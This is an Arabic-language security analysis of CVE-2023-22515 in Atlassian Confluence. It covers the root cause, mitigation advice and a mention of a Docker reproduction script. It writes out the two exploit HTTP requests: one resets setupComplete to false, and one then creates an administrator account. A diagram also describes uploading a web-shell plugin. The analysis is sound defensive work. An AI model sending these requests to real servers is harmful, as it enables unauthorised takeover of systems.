
تحليل تقني واستغلال إثبات المفهوم لـ CVE-2023-22515، وهي ثغرة حرجة في التحكم في الوصول المكسور في Atlassian Confluence تسمح بإنشاء حساب مسؤول دون مصادقة واختراق النظام.
[!IMPORTANT] تحذير أمني عاجل: هذه الثغرة هي أخطر ثغرة بدرجة 10.0 (Critical) حسب مقياس CVSS. إذا كنت تستخدم إصدارًا متأثرًا، فيجب تطبيق التصحيح فورًا.
CVE-2023-22515 هي ثغرة خطيرة من نوع Broken Access Control تم اكتشافها في Atlassian Confluence Data Center و Server. يمكن للمهاجم عن بُعد دون مصادقة التلاعب بحالة إعدادات الخادم لإنشاء حساب مسؤول والسيطرة الكاملة على النظام.
| البند | التفاصيل |
|---|---|
| معرف الثغرة | CVE-2023-22515 |
| الخطورة | CRITICAL (CVSS 10.0) |
| الإصدارات المتأثرة | 8.0.0 ~ 8.5.1 (تحقق من الإصدارات المحددة) |
| نوع الهجوم | تجاوز المصادقة وتصعيد الامتيازات |
يتم تشغيل هذه الثغرة عن طريق تغيير المهاجم قيمة bootstrapStatusProvider.applicationConfig.setupComplete إلى false عبر نقطة النهاية /server-info.action.
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득
[!NOTE] المبدأ الأساسي: بدلاً من تعديل ملف الإعدادات الدائم (
confluence.cfg.xml)، يتم تغيير حالة وقت التشغيل في الذاكرة لتجاوز منطق التحكم في الوصول.
حدثت الثغرة بسبب ثغرة في ربط المعاملات (parameter binding) في إطار عمل XWork2 وعدم التحقق من الإدخال الخارجي للخاصية الحساسة (setupComplete) في فئة الإجراء (ServerInfoAction) في Confluence.
يمكن للمهاجم تعطيل الخادم بمجرد طلب HTTP بسيط.
1. طلب إعادة تعيين الإعدادات:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. طلب إنشاء مسؤول:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
يمكنك تجربة الثغرة في بيئة Docker آمنة من خلال حزمة إعادة الإنتاج (cve-2023-22515-repro) المرفقة مع هذا التقرير.
يتضمن البرنامج النصي التوضيحي الذي يسمح بمشاهدة عملية الاختراق الفعلية بصريًا في الطرفية.
# 데모 실행 명령어
bash cinematic_pwn.sh
[!TIP] البرنامج النصي التوضيحي يقوم بأتمتة العملية الكاملة لمهاجمة الخادم الفعلي (
localhost:8090) وإنشاء حساب مسؤول ومحاولة تسجيل الدخول.
الحل الأكيد هو الترقية إلى الإصدارات المعدلة التي توفرها Atlassian.
إذا كان التصحيح صعبًا، فقم بحظر الوصول إلى أنماط URL التالية على أجهزة أمان الشبكة (WAF، موازن التحميل، إلخ).
*/setup/*CVE-2023-22515 هي ثغرة خطيرة ذات صعوبة هجوم منخفضة جدًا ولكنها تمكن من السيطرة الكاملة على النظام. يجب على مسؤولي الأمن تطبيق التصحيح فورًا ومراقبة ما إذا كان قد حدث اختراق.
تاريخ الكتابة: 2026-01-16 | الكاتب: فريق تحليل أمن Antigravity